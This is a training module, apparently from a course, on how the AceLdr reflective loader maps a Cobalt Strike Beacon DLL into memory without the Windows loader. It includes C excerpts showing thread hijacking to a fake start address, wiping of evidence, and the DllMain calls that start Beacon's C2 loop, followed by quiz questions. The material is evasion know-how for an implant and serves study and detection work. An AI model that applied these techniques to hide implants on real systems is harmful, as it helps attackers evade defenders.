Module 4: Reflective DLL Loading
Loading a DLL without Windows ever knowing about it.
What Makes It "Reflective"?
Normally, you call LoadLibrary("beacon.dll") and Windows handles everything: maps the file, resolves imports, applies relocations. But that leaves traces everywhere - the module appears in the PEB module list, file-backed memory, event logs. Reflective loading means the DLL loads itself from raw bytes in memory, bypassing the Windows loader entirely. No file on disk, no entry in the module list.
Why "Reflective"?
The term was coined by Stephen Fewer. The idea is that the loader is contained within the DLL itself - it "reflects" back to parse and load its own PE structure. In AceLdr's case, the loader (position-independent shellcode) is prepended to the Beacon DLL. When executed, it parses the attached PE, maps it into memory, and runs it. The entire process happens without touching the filesystem or the Windows loader.
AceLdr's Loading Sequence
The complete chain from shellcode injection to Beacon running, in 11 steps:
Full Reflective Loading Pipeline
Understanding Each Step
Steps 1-2 handle the initial execution and thread setup. Steps 3-5 prepare the runtime environment: resolving API functions, parsing the PE, and allocating memory. Steps 6-9 perform the actual loading: copying code, setting up the heap, and installing hooks. Step 10 hardens the memory (from writable to executable). Step 11 finally hands control to Beacon.
Thread Hijacking via Ace()
AceLdr doesn't just call Loader() directly. It creates a suspended thread and overwrites its instruction pointer. This is a common technique to avoid having the loader's call stack visible during Beacon execution:
C - from ace.cVOID Ace( VOID )
{
API Api;
CONTEXT Ctx;
HANDLE Thread;
// ... resolve NtGetContextThread, NtSetContextThread, etc.
// Create a suspended thread at an innocent-looking start address
// (RtlUserThreadStart + 0x21 is a ret instruction)
PVOID StartAddress = pApi->ntdll.RtlUserThreadStart + 0x21;
pApi->ntdll.RtlCreateUserThread(
(HANDLE)-1, // current process
NULL, TRUE, // suspended = TRUE
0, 0, 0,
StartAddress, // innocent start address
NULL, &Thread, NULL );
// Hijack: overwrite RIP to point at our Loader function
Ctx.ContextFlags = CONTEXT_CONTROL;
Api.ntdll.NtGetContextThread( Thread, &Ctx );
Ctx.Rip = (DWORD64) Loader; // <-- The hijack
Api.ntdll.NtSetContextThread( Thread, &Ctx );
// Resume the thread - it now executes Loader() instead
Api.ntdll.NtResumeThread( Thread, NULL );
// Clean up evidence
RtlSecureZeroMemory( &Api, sizeof(Api) );
RtlSecureZeroMemory( &Ctx, sizeof(Ctx) );
}
Why Not Just Call Loader() Directly?
If AceLdr called Loader() directly, the call stack during Beacon execution would trace all the way back through the injection point. When memory scanners inspect sleeping threads, they examine the call stack. A clean thread created via RtlCreateUserThread with its RIP hijacked to Loader() has a much more innocuous-looking stack. The original thread (which ran the shellcode) can exit cleanly, leaving no trace.
The STUB Structure
AceLdr's STUB structure sits at the very beginning of the allocated region and acts as the control block for all hook functions:
C - from include.htypedef struct __attribute__(( packed ))
{
ULONG_PTR Region; // Base address of entire allocation
ULONG_PTR Size; // Total size of allocation
HANDLE Heap; // Handle to private heap
} STUB, *PSTUB;
This compact 24-byte structure contains everything AceLdr's hooks need at runtime:
- Region: The base address, needed by the sleep hook to know what memory region to encrypt/decrypt
- Size: Total allocation size, so the sleep hook knows how many bytes to encrypt
- Heap: The private heap handle, returned by
GetProcessHeap_Hook()
Memory Layout After Loading
Memory Layout After Reflective Load
Key Insight: Why the Stub Sits First
The hook functions need to know where the allocation starts (to encrypt it during sleep) and where the heap is (to redirect GetProcessHeap). By placing the STUB at the start and using position-independent addressing (OFFSET(Stub)), any hook function can find this data without global variables. The OFFSET macro (covered in Module 5) calculates the runtime address of the Stub relative to the current instruction pointer.
Executing Beacon: DllMain
After all loading steps are complete, AceLdr calls Beacon's DllMain entry point with two different reason values:
C - from ace.c executeBeacon()// First call: Standard DLL initialization
DllMain( beaconBase, DLL_PROCESS_ATTACH, NULL ); // reason = 1
// Second call: Cobalt Strike-specific "start beacon" signal
DllMain( beaconBase, 4, NULL ); // reason = 4 (Beacon init)
DllMain Reason Values
Reason 1 (DLL_PROCESS_ATTACH) is the standard Windows notification that a DLL has been loaded into a process. Beacon uses this to perform its initial setup. Reason 4 is a Cobalt Strike-specific convention for User Defined Reflective Loaders (UDRL). It signals Beacon to begin its main C2 communication loop. This two-step initialization allows Beacon to differentiate between "I've been loaded" and "start operating."
Pop Quiz: Reflective Loading
Q1: Why does Ace() create a suspended thread instead of calling Loader() directly?
Q2: executeBeacon() calls DllMain with two different "reason" values. What are they?